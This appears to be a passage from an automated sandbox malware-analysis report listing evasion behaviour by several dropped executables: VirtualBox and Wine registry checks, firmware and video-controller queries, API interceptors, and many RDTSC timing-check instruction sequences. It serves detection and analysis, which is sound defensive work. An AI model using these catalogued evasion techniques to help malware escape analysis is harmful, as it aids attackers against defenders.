                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSystem information queried: FirmwareTableInformation
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSystem information queried: FirmwareTableInformation
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 632779
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 6081C8
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 5FFED0
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 680788
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 6829EE
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 634A13
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 5518BA
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 609FCB
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 677288
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 60F26E
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeAPI/Special instruction interceptor: Address: 7FF9105CE814
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeAPI/Special instruction interceptor: Address: 6C057C44
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeAPI/Special instruction interceptor: Address: 6C057C44
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeAPI/Special instruction interceptor: Address: 6C057945
                          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C053B54
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31AA1 second address: C31AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31AA7 second address: C31AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31AAB second address: C31AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31AB1 second address: C31AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0550D663C6h 0x00000009 jmp 00007F0550D663D5h 0x0000000e popad 0x0000000f pushad 0x00000010 jnp 00007F0550D663C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31AD9 second address: C31ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C1D873 second address: C1D87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C30C90 second address: C30CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0550733D16h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C30DED second address: C30E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jmp 00007F0550D663D1h 0x0000000b pop ecx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C30E05 second address: C30E0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C30FA3 second address: C30FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31110 second address: C31114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31114 second address: C3111C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C3111C second address: C31122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31122 second address: C31132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550D663CCh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C31132 second address: C31136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C3417E second address: C341E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jns 00007F0550D663C6h 0x0000000d pop ebx 0x0000000e popad 0x0000000f xor dword ptr [esp], 4D7993B5h 0x00000016 jmp 00007F0550D663CEh 0x0000001b lea ebx, dword ptr [ebp+12454F8Eh] 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F0550D663C8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D57BEh], esi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0550D663D6h 0x00000049 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C343E0 second address: C343E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C343E5 second address: C34419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0550D663CBh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jmp 00007F0550D663CFh 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jbe 00007F0550D663C6h 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C34531 second address: C34536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C18653 second address: C18657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C18657 second address: C1865B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C1865B second address: C18661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C18661 second address: C1866C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C535C3 second address: C535CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C5373B second address: C53741 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C53C9A second address: C53CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0550D663C6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C53DEF second address: C53E06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F0550733D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d jg 00007F0550733D1Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C540B2 second address: C540C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0550D663CFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C540C6 second address: C540CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C540CC second address: C540D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C5424D second address: C54253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C54253 second address: C54257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C547BD second address: C547C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C547C1 second address: C547D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0550D663C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0550D663CCh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C547D9 second address: C547EC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0550733D0Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C54940 second address: C54974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0550D663EFh 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0550D663CBh 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C54A8A second address: C54AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550733D11h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C54AA3 second address: C54AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C54AA9 second address: C54AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C54AB0 second address: C54ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F0550D663C6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C54EC2 second address: C54EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C577EC second address: C577F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C5662B second address: C5662F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C5662F second address: C56639 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0550D663C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C56639 second address: C56648 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C5808C second address: C5809B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C5D95C second address: C5D962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C5D962 second address: C5D968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C5D968 second address: C5D973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C2C79A second address: C2C7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0550D663D8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0550D663CBh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C61108 second address: C6110C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C61411 second address: C61429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0550D663D3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C61429 second address: C61433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6186A second address: C618B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F0550D663C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 jmp 00007F0550D663D2h 0x00000017 popad 0x00000018 pushad 0x00000019 js 00007F0550D663CEh 0x0000001f jo 00007F0550D663C6h 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007F0550D663CEh 0x0000002c jl 00007F0550D663CEh 0x00000032 pushad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C61BC5 second address: C61BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C61BCA second address: C61BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C61BD0 second address: C61BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C625AF second address: C625B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C62F6F second address: C62F8B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0550733D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c jbe 00007F0550733D18h 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F0550733D06h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C63043 second address: C63050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C63180 second address: C63187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C63274 second address: C63298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0550D663D6h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C63298 second address: C632A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C632A2 second address: C632A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C63A06 second address: C63A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0550733D06h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0550733D17h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C63A2C second address: C63AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F0550D663C8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 xor dword ptr [ebp+122D2F19h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F0550D663C8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 call 00007F0550D663CCh 0x0000004b sbb di, 1D5Ch 0x00000050 pop edi 0x00000051 push 00000000h 0x00000053 mov dword ptr [ebp+122D1ED1h], edx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push edx 0x0000005f pop edx 0x00000060 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C63AA3 second address: C63ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6555D second address: C655DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0550D663C8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F0550D663C8h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e mov esi, dword ptr [ebp+122D3143h] 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push ebx 0x00000049 call 00007F0550D663C8h 0x0000004e pop ebx 0x0000004f mov dword ptr [esp+04h], ebx 0x00000053 add dword ptr [esp+04h], 0000001Ah 0x0000005b inc ebx 0x0000005c push ebx 0x0000005d ret 0x0000005e pop ebx 0x0000005f ret 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 ja 00007F0550D663C6h 0x0000006a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C655DA second address: C655F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C660FB second address: C66100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
